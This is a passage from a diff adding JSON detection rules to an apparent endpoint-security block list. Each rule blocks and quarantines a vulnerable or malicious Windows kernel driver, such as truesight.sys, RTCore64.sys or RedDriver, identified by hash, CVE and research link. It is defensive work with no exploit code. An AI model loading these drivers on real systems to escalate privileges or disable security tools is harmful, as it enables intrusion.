+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141388Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "441cc113a5ecaea7af80c9ed97fc8e93ea6ffc4c61b617f48ef85bb7ce94b168",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7057406b-d010-5e88-ba7d-0eb9023d6da1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974522Z",
+ "creation_date": "2026-03-23T11:45:29.974524Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974530Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2e37c0e580bf6f0514af985b1581fef3d66b845aeefa790c625964512a911659",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "705fe14d-0504-5ebb-81c2-4c00c96589de",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.823677Z",
+ "creation_date": "2026-03-23T11:45:31.823679Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.823685Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "13c3c6880f501557d1fee13215167db7afa1bc65b62f242010ad828885f8dd0f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "70600820-a0f2-5286-b192-592f4049227e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.499431Z",
+ "creation_date": "2026-03-23T11:45:31.499434Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.499443Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8073039514143cc1863f7bd4488c7433b115f5cb1240311fb412313493143128",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "706d9f5b-4362-5eec-ad84-2a9e0095b466",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618460Z",
+ "creation_date": "2026-03-23T11:45:29.618462Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618468Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ffd1aef19646ffed09b56a2ace4fc8cdf5b2f714fcca1e7ffb82256264c94b18",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "707bbba4-e3a9-59d0-81c4-db1a37925fb1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143200Z",
+ "creation_date": "2026-03-23T11:45:31.143202Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143208Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "13f39c57ce0cee25ed6889a045bbfad1fca4de361ea8ed19e3a3af9b234b9781",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "707f98a3-10dc-5f99-8a00-460b93a596f1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615345Z",
+ "creation_date": "2026-03-23T11:45:29.615347Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615352Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a6bf32fafa57bcbb84b06db0d7d28e4b1457ead69c33fa883d5abe84ecd91b51",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "708e4cad-ce8a-595d-bc1e-ad904649beaf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972038Z",
+ "creation_date": "2026-03-23T11:45:29.972040Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972045Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a566af57d88f37fa033e64b1d8abbd3ffdacaba260475fbbc8dab846a824eff5",
+ "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "70914d32-e1fd-5ab6-b043-fa1a9ee6e269",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983649Z",
+ "creation_date": "2026-03-23T11:45:29.983651Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983657Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "09043c51719d4bf6405c9a7a292bb9bb3bcc782f639b708ddcc4eedb5e5c9ce9",
+ "comment": "Vulnerable Kernel Driver (aka amigendrv64.sys) [https://www.loldrivers.io/drivers/5c45ae9e-cb6f-4eab-a070-b0187202e080/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7099faa7-5d88-5a2f-ab1c-411f4d0afa68",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.152210Z",
+ "creation_date": "2026-03-23T11:45:31.152212Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.152220Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c267cfb40ffc24533cbfde1f1f457948f1d07de9eafc24b27db8df1af71a7f79",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "70a1889f-80f7-5b0a-9eab-2d3abfffbe92",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.834609Z",
+ "creation_date": "2026-03-23T11:45:30.834612Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.834621Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ec7ae3b91784e5d5a57ec6e9e89b66a18c6274b559c8d4890037f7e0651664b3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "70a71990-6094-5dc1-99fd-efcba9885d3f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618219Z",
+ "creation_date": "2026-03-23T11:45:29.618221Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618227Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9155470dc24449977d1be15a116b08705dd4c113a2eb4ab19a6000749ff4b100",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "70ab1e16-e316-5a18-b8c0-83afd3077077",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985996Z",
+ "creation_date": "2026-03-23T11:45:29.985998Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.986004Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f929b77636026cc0c57a0bd95e4c61f0b28a65e60331807e32235947f5c67931",
+ "comment": "Malicious Kernel Driver related to RedDriver (aka telephonuAfY.sys, spwizimgVT.sys, 834761775.sys, reddriver.sys, typelibdE.sys, NlsLexicons0024UvN.sys and ktmutil7ODM.sys) [https://blog.talosintelligence.com/undocumented-reddriver/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "70ad899c-c853-5a9c-8211-17df2dfd4c61",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607258Z",
+ "creation_date": "2026-03-23T11:45:29.607260Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607265Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd",
+ "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "70b6c5ff-10e2-50b6-9e3b-2cebafff18de",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155276Z",
+ "creation_date": "2026-03-23T11:45:31.155278Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155283Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1287885c5c87886fcae9bd18ff9a82c0231451315f16f7ec1a8111673127161c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "70c3f0ab-9bb0-59b6-af08-61bcba69338b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825628Z",
+ "creation_date": "2026-03-23T11:45:31.825630Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825636Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "826267a0c3f7fe9aee8242accbf5563560988137702eb6dd8a14bf66790447cc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "70cd4617-678e-5297-8502-f918ed8e744a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613442Z",
+ "creation_date": "2026-03-23T11:45:29.613444Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613450Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fee4560f2160a951d83344857eb4587ab10c1cfd8c5cfc23b6f06bef8ebcd984",
+ "comment": "ASRock vulnerable drivers - Privilege Escalation (aka AsrDrv10X.sys) [CVE-2018-10709] [https://www.exploit-db.com/exploits/45716] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "70d4d297-8723-5420-9b23-963fb7396391",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.813947Z",
+ "creation_date": "2026-03-23T11:45:31.813960Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.813969Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "60da0e6b6127b7298f24da50ea4f028f260a629efde08d6926180ee1a7466639",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "70d7c968-5cea-5cc6-bca5-a5327bc47b82",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611201Z",
+ "creation_date": "2026-03-23T11:45:29.611203Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611208Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "313a69d8eea6a933cffac0fa67d46ad9aef0815bb579fce7623d9be825888e30",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "70e87570-d502-5f55-8b99-1bbd06c1c9c1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.474274Z",
+ "creation_date": "2026-03-23T11:45:30.474277Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.474286Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f291f251d8ffc6c6c2f69b62e8d1153bdb83f54cf60ef9a4c6235db87bfb2c1a",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "70e8e1af-9c87-5ebe-abdb-bfea8348e5eb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.808339Z",
+ "creation_date": "2026-03-23T11:45:31.808341Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.808347Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6a95ec5a6bd3798a928eff37d2657cb948542d9156d0ecce05c4083f5e2b62f9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "70f067cd-c15a-5147-8d38-9791c5ba0ff7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.500469Z",
+ "creation_date": "2026-03-23T11:45:31.500472Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.500480Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2fdc8c7638c8d9bff60603f4c659c18916d25810c34f953d663a2dfd16fb5392",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "70f120b3-746a-5b48-88e3-8449db36ce1c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826025Z",
+ "creation_date": "2026-03-23T11:45:30.826028Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
